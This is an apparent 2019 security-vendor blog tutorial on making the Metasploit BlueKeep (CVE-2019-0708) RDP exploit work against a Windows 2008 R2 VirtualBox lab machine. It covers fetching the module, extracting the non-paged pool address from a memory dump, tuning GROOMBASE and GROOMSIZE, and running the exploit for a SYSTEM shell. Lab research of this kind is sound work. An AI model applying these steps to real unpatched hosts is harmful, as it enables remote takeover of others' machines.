How to Exploit BlueKeep Vulnerability with Metasploit
Sep 10, 2019 • Razvan Ionescu, Stefan Bratescu, Cristin Sirbu
We show how to obtain a Meterpreter shell on a vulnerable Windows 2008 R2 machine by adjusting the Metasploit module code (GROOMBASE and GROOMSIZE values) because the exploit does not currently work out-of-the-box.
Further on, we explain the steps we took to make the module work properly on our target machine:
- Installing the Bluekeep exploit module in Metasploit
- Preparing the target machine
- Adjusting the BlueKeep exploit
- Running the exploit module
BlueKeep is a critical Remote Code Execution vulnerability in Microsoft’s RDP service. Since the vulnerability is wormable, it has caught a great deal of attention from the security community, being in the same category with EternalBlue MS17-010 and Conficker MS08-067. You can read an in-depth analysis of the BlueKeep vulnerability on our blog post.
A few days ago, a Metasploit contributor - zerosum0x0 - has submitted a pull request to the framework containing an exploit module for BlueKeep(CVE-2019-0708). The Rapid7 team has also published an article about this exploit on their blog.
As of now, the module is not yet integrated into the main Metasploit branch (it’s still a pull request) and it only targets Windows 2008 R2 and Windows 7 SP1, 64-bit versions. Furthermore, the module is now ranked as Manual since the user needs to provide additional information about the target, otherwise it risks of crashing it with BSOD.
For this scenario to work, we used the following:
VirtualBox 6 for hosting the target Windows VM
An outdated Windows 2008 R2 64bit .iso image; the latest Hotfixes installed on our target VM were: KB2888049 and KB976902
A Linux machine where to setup Metasploit (it can be virtual machine or physical)
On the Linux machine, first we need to clone the Metasploit project:
$ git clone https://github.com/rapid7/metasploit-framework.git $ cd metasploit-framework
Then we need to get the branch with the pull request mentioned above:
$ git fetch origin pull/12283/head:bluekeep $ git checkout bluekeep
After that, we have to install the dependencies needed for Metasploit:
$ gem install bundler && bundle
During this step you may encounter errors like this:
An error occurred while installing pg (0.21.0), and Bundler cannot
continue. Make sure that `gem install pg -v '0.21.0' --source
'https://rubygems.org/'` succeeds before Bundling.
To fix it, you need to install the development library for PostgreSQL:
apt-get install libpq-dev
Another error that we encountered was:
An error occurred while installing pcaprub (0.13.0), and Bundler cannot continue. Make sure that `gem install pcaprub -v '0.13.0' --source 'https://rubygems.org/'` succeeds before bundling.
And we fixed it with:
apt-get install libpcap-dev
At this point the Metasploit dependencies were installed correctly and we were able to use the BlueKeep exploit module with:
$ ./msfconsole msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
Our target was an outdated Windows 2008 R2 64bit machine installed on Virtual Box 6.
Here is its
The target VM had the following properties:
- 2GB RAM
- 1 Core processor
- 30 GB HDD storage size
As stated in the exploit comments, for Windows Server 2008 we have to set the following registry key
HKLM\\SYSTEM\\CurrentControlSet\\ Control\\TerminalServer\\ WinStations\\RDP-Tcp\\fDisableCam
0. This is not a default setting for this target OS but it is needed for the RDPSND channel to work:
The exploit did not work out of the box. We obtained several BSODs, but not a shell.
The bluescreen text says that we have a page fault issue, meaning that some memory addresses were not properly set.
What we actually need for our exploit is the correct GROOMBASE value which is the start address of the Non Paged Pool area (NPP).
We need to extract the NPP Address from a memory dump of the target machine.
Getting the memory dump of the target machine
This operation can be easily done with VirtualBox. The target machine needs to be started in VirtualBox and you need to run the following command (on your Windows host) to get the memory dump:
cmd> C:\Program Files\Oracle\VirtualBox\VBoxManage.exe debugvm "vm_name" dumpvmcore --filename=vm.memdump
The same can be done if you are using VirtualBox on a Linux host, using the command:
$ VBoxManage debugvm <uuid|vmname> dumpvmcore [--filename=name]
Note: The free VMWare Workstation Player 15 version doesn’t allow for memory dumps, thus we recommend using VirtualBox.
Extracting the NPP Address
We use rekall in a Docker container for this operation. Here is how we download the Docker image with rekall on our host machine:
$ docker pull remnux/rekall
Now we copy the memory dump into our home directory and we need to make it accessible from within the docker container. For this you need to run the docker container with the following commands:
$ cp dump_location/vm.memdump ~/bluekeep $ docker run --rm -it -v ~/bluekeep:/home/nonroot/files remnux/rekall bash
Now run rekall by typing:
$ rekall -f files/dump_blue.memdump pools
The output should be something like this:
This shows the start address of NPP on your virtual machine, which will be placed in the GROOMBASE variable of the exploit.
Editing the exploit module
The code of the exploit is located in
modules/exploits/windows/rdp/ cve_2019_0708_bluekeep_rce.rb and you need to set the GROOMBASE variable under the “Virtualbox 6” section by replacing it with the extracted NPP Start Address. In our case it was:
Now you need to reload the Metasploit module using the command:
msf5 > reload_all
Now we can start configuring the module from the Metasploit interface.
The first thing is to change the parameter GROOMSIZE to 50. This is related to the amount of memory the virtual machine has and this is the value that worked for our situation.
msf5> set GROOMSIZE 50
The rest of the parameters are standard (
LHOST) and you can see their configuration in the image below:
Note: the parameters starting with RDP_* are not necessary to be configured. They do not affect the functionality of the exploit.
We did also
set target 2 to choose the target on VirtualBox, then run the
check command and afterwards
As you can see, the exploit gives the attacker the capability to remotely execute code as the user NT AUTHORITY/SYSTEM, which is the Local System account with highest level privileges on the Windows machine.
Even though the proposed Metasploit module for BlueKeep does not give you a remote shell with the default configuration, its addition to Metasploit urges system administrators and home users to patch their Windows machines.
We are confident that the security community will discover pretty quickly a method for automatically detecting the NPP start address, which will make this exploit fully reliable on multiple targets.
- Capital One, CafePress, Suprema data breaches and their root causes
- Analysis of recent Exim mail server vulnerabilities
- How to Perform Internal Network Scanning with Pentest-Tools.com
- How to Exploit BlueKeep Vulnerability with Metasploit
- How to Perform Authenticated Website Scans with Pentest-Tools.com
- Pentest-Tools.com to participate at Black Hat Europe 2019
- BlueKeep, the Microsoft RDP vulnerability – What we know so far
- Exploiting Magento SQL Injection with Sqlmap
- How to do a Basic Website Vulnerability Assessment with Pentest-Tools.com
- Analysis of a WordPress Remote Code Execution Attack
- All posts ...